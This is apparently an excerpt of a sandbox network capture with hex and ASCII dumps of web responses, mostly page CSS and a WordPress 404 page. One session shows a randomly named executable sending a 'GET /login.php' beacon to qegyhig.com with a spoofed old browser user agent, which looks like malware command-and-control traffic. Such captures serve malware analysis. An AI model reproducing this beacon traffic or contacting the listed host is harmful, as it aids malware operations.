                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c
                                                                                                                                                                                                                  Data Ascii: ead><meta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74
                                                                                                                                                                                                                  Data Ascii: verflow-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-ampht
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f
                                                                                                                                                                                                                  Data Ascii: ortant;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:no
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                                                                                                                                                  Data Ascii: ]):not(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inl
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 61 62 6c 65 2d 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                  Data Ascii: able-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d
                                                                                                                                                                                                                  Data Ascii: html-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-im
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 6d 70 6f 72 74 61 6e 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b
                                                                                                                                                                                                                  Data Ascii: mportant;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{back
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65
                                                                                                                                                                                                                  Data Ascii: ant;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  9192.168.2.652171188.114.96.34431220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:51:08 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC956INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BjkOH46Ad7pds8uH%2FYqKlYGA9iz3%2FTkRCsONZ6WSREcNM%2FpFMR1K0UJv8DH9lJ4mRuEBEbLQZBczqOo3%2BrB7SHivU3MjxTKmTnPeJSZk2PjevX%2FL0T0Sh8%2BgQFqfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020f139fe5e82-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2019525&cwnd=250&unsent_bytes=0&cid=0dba1a167853490a&ts=1011&x=0"
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC413INData Raw: 37 63 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                                  Data Ascii: 7ca2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65
                                                                                                                                                                                                                  Data Ascii: }</style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><me
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e
                                                                                                                                                                                                                  Data Ascii: ;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d
                                                                                                                                                                                                                  Data Ascii: defined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e
                                                                                                                                                                                                                  Data Ascii: |{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/min
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 72 20 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d
                                                                                                                                                                                                                  Data Ascii: r .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e
                                                                                                                                                                                                                  Data Ascii: nge]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .n
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e
                                                                                                                                                                                                                  Data Ascii: y-content .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 2d 76 69 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75
                                                                                                                                                                                                                  Data Ascii: -visible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,inpu
